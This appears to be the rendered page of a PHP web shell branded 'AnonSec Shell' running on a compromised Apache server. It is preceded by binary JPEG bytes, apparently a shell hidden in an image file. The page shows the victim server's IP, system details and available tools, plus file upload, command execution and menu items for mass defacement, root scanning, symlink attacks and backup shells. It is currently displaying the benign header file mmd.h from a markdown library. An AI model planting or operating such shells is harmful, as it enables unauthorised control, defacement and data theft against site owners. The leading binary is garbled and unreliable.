JFIF  H H C nxxd C "     &    !1A2Q"aqBb    1   ? R{~ ,.Y| @sl_޸s[+6ϵG};?2Y`&9LP ?3rj  "@V]:3T -G*P ( *(@AEY]qqqALn +Wtu?)l QU T* Aj- x:˸T u53Vh @PS@ ,i,!"\hPw+E@ ηnu ڶh% (Lvũbb- ?M֍݌٥IHln㏷L(6 9L^"6P  d&1H&8@TUT CJ%eʹFTj4i5=0g J &Wc+3kU@PS@HH33M * "Uc(\`F+b{RxWGk ^#Uj*v' V ,FYKɠMckZٸ]ePP  d\A2glo=WL(6 ^;k"ucoH"b ,PDVlvL_/:̗rN\m dcw T-O$w+FZ5T *Y~l: 99U)8ZAt@GLX*@bijqW;MᎹ،O[5*5*@=qusݝ *EPx՝.~ YИ 3M3@E)GTg%Anp P MUҀhԳW c֦iZ ffR 7qMcyAZT c0bZU k+oG<] APQ T A={PDti@c>>KÚ"q L.1P k6QY7t.k7o  <P &yַܼJZy Wz{UrS @ ~P)Y:A"]Y&ScVO%17 6l4 i4YR5 ruk* ؼdZͨZZ cLakb3N6æ\1`XTloTuT AA 7Uq@2ŬzoʼnБRͪ&8}: e}0ZNΖJ*Ս9˪ޘtao]7$ 9EjS} qt" ( .=Y:V#'H: δ4#6yjѥBB ;WD-ElFf67*\AmAD Q __'2$ TX 9nu'm@iPDT qS`%u%3[nY,  :g = tiX H]ij"+6Z* .~|05s6 ,ǡ ogm+ KtE-BF  ES@(UJ xM~8%g/= Vw[Vh 3lJT  rK -kˎY ٰ  ,ukͱٵf sXDP  ]p]&MS95O+j &f6m463@ t8ЕX=6}HR 5ٶ06 /@嚵*6  " hP@eVDiYQT `7tLf4c?m//B4 laj  L} :E  b#PHQb, yN`rkAb^ |} s4XB4 * ,@[{Ru+%le2} `,kI$U` >OMuh  P % ʵ/ L\5aɕVN1R6 3}ZLj-Dl@ *( K\^i@F@551 k㫖h  Q沬#h XV +;]6z OsFpiX $OQ ) ųl4 YtK'(W AnonSec Shell
AnonSec Shell
Server IP : 20.75.53.88  /  Your IP : 216.73.217.165   [ Reverse IP ]
Web Server : Apache
System : Linux VMRALP-3 4.4.0-256-generic #290~14.04.1-Ubuntu SMP Thu Jun 20 09:24:50 UTC 2024 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29+esm15
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
Domains : 3 Domains
MySQL : ON  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/siac/croce/admin/components/htmldoc-master/htmldoc/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/www/html/siac/croce/admin/components/htmldoc-master/htmldoc/mmd.h
/*
 * Header file for miniature markdown library.
 *
 *     https://github.com/michaelrsweet/mmd
 *
 * Copyright © 2017-2019 by Michael R Sweet.
 *
 * Licensed under Apache License v2.0.  See the file "LICENSE" for more
 * information.
 */

#ifndef MMD_H
#  define MMD_H

/*
 * Include necessary headers...
 */

#  include <stdio.h>


/*
 * Constants...
 */

enum mmd_option_e
{
  MMD_OPTION_NONE = 0x00,		/* No markdown extensions */
  MMD_OPTION_METADATA = 0x01,		/* Jekyll metadata extension */
  MMD_OPTION_TABLES = 0x02,		/* Github table extension */
  MMD_OPTION_ALL = 0x03			/* All supported markdown extensions */
};
typedef unsigned mmd_option_t;

typedef enum mmd_type_e
{
  MMD_TYPE_NONE = -1,
  MMD_TYPE_DOCUMENT,			/* The document root */
  MMD_TYPE_METADATA,			/* Document metadata */
  MMD_TYPE_BLOCK_QUOTE,			/* <blockquote> */
  MMD_TYPE_ORDERED_LIST,		/* <ol> */
  MMD_TYPE_UNORDERED_LIST,		/* <ul> */
  MMD_TYPE_LIST_ITEM,			/* <li> */
  MMD_TYPE_TABLE,			/* <table> */
  MMD_TYPE_TABLE_HEADER,		/* <thead> */
  MMD_TYPE_TABLE_BODY,			/* <tbody> */
  MMD_TYPE_TABLE_ROW,			/* <tr> */
  MMD_TYPE_HEADING_1 = 10,		/* <h1> */
  MMD_TYPE_HEADING_2,			/* <h2> */
  MMD_TYPE_HEADING_3,			/* <h3> */
  MMD_TYPE_HEADING_4,			/* <h4> */
  MMD_TYPE_HEADING_5,			/* <h5> */
  MMD_TYPE_HEADING_6,			/* <h6> */
  MMD_TYPE_PARAGRAPH,			/* <p> */
  MMD_TYPE_CODE_BLOCK,			/* <pre><code> */
  MMD_TYPE_THEMATIC_BREAK,		/* <hr /> */
  MMD_TYPE_TABLE_HEADER_CELL,		/* <th> */
  MMD_TYPE_TABLE_BODY_CELL_LEFT,	/* <td align="left"> */
  MMD_TYPE_TABLE_BODY_CELL_CENTER,	/* <td align="center"> */
  MMD_TYPE_TABLE_BODY_CELL_RIGHT,	/* <td align="right"> */
  MMD_TYPE_NORMAL_TEXT = 100,		/* Normal text */
  MMD_TYPE_EMPHASIZED_TEXT,		/* <em>text</em> */
  MMD_TYPE_STRONG_TEXT,			/* <strong>text</strong> */
  MMD_TYPE_STRUCK_TEXT,			/* <del>text</del> */
  MMD_TYPE_LINKED_TEXT,			/* <a href="link">text</a> */
  MMD_TYPE_CODE_TEXT,			/* <code>text</code> */
  MMD_TYPE_IMAGE,			/* <img src="link" /> */
  MMD_TYPE_HARD_BREAK,			/* <br /> */
  MMD_TYPE_SOFT_BREAK,			/* <wbr /> */
  MMD_TYPE_METADATA_TEXT		/* name: value */
} mmd_type_t;


/*
 * Types...
 */

typedef struct _mmd_s mmd_t;


/*
 * Functions...
 */

#  ifdef __cplusplus
extern "C" {
#  endif /* __cplusplus */

extern char         *mmdCopyAllText(mmd_t *node);
extern void         mmdFree(mmd_t *node);
extern const char   *mmdGetExtra(mmd_t *node);
extern mmd_t        *mmdGetFirstChild(mmd_t *node);
extern mmd_t        *mmdGetLastChild(mmd_t *node);
extern const char   *mmdGetMetadata(mmd_t *doc, const char *keyword);
extern mmd_t        *mmdGetNextSibling(mmd_t *node);
extern mmd_option_t mmdGetOptions(void);
extern mmd_t        *mmdGetParent(mmd_t *node);
extern mmd_t        *mmdGetPrevSibling(mmd_t *node);
extern const char   *mmdGetText(mmd_t *node);
extern mmd_type_t   mmdGetType(mmd_t *node);
extern const char   *mmdGetURL(mmd_t *node);
extern int          mmdGetWhitespace(mmd_t *node);
extern int          mmdIsBlock(mmd_t *node);
extern mmd_t        *mmdLoad(const char *filename);
extern mmd_t        *mmdLoadFile(FILE *fp);
extern void         mmdSetOptions(mmd_option_t options);

#  ifdef __cplusplus
}
#  endif /* __cplusplus */

#endif /* !MMD_H */

Anon7 - 2022
AnonSec Team